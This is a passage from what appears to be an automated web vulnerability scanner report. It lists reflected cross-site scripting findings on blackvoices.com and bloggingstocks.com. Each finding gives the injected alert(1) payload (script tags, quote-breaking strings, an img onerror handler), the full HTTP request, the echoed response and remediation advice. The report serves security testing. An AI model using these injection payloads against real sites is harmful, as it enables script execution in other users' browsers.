Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 96996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1"/>
...[SNIP]...

1.250. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /life-style/black-travel

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 200d9"-alert(1)-"24b08b883ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life-style200d9"-alert(1)-"24b08b883ad/black-travel HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240378380.1628589389.2600273152; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:16:07 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 30969
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="life-style200d9"-alert(1)-"24b08b883ad";
s_265.prop2="black-travel";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/life-style200d9\"-alert(1)-\"24b08b883ad/black-travel";
s_265.linkInternalFilters="
...[SNIP]...

1.251. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /life-style/black-travel

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d24"-alert(1)-"b7bf6e6c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life-style/black-travelb0d24"-alert(1)-"b7bf6e6c1a HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.1997950285.3749250816; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:16:11 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 30965
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="life-style";
s_265.prop2="black-travelb0d24"-alert(1)-"b7bf6e6c1a";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/life-style/black-travelb0d24\"-alert(1)-\"b7bf6e6c1a";
s_265.linkInternalFilters="javascript:,aol.com,blackvoic
...[SNIP]...

1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f020e"-alert(1)-"014356e96ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f020e"-alert(1)-"014356e96ab=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
s.pf";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,bloggingstocks.com";
s_265.mmxgo = true;
s_265.prop1="BloggingStocks";
s_265.prop2="Home";
s_265.prop12="http://www.bloggingstocks.com/?f020e"-alert(1)-"014356e96ab=1";
s_265.prop16="BloggingStocks";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218f9"><script>alert(1)</script>7dcb406a603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?218f9"><script>alert(1)</script>7dcb406a603=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
<link rel="canonical" href="http://www.bloggingstocks.com/?218f9"><script>alert(1)</script>7dcb406a603=1"/>
...[SNIP]...

1.254. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /category/stocks-to-buy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0 was submitted in the REST URL parameter 2. This input was echoed as 898c0"><img src=a onerror=alert(1)>608c32bafe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/stocks-to-buy898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en<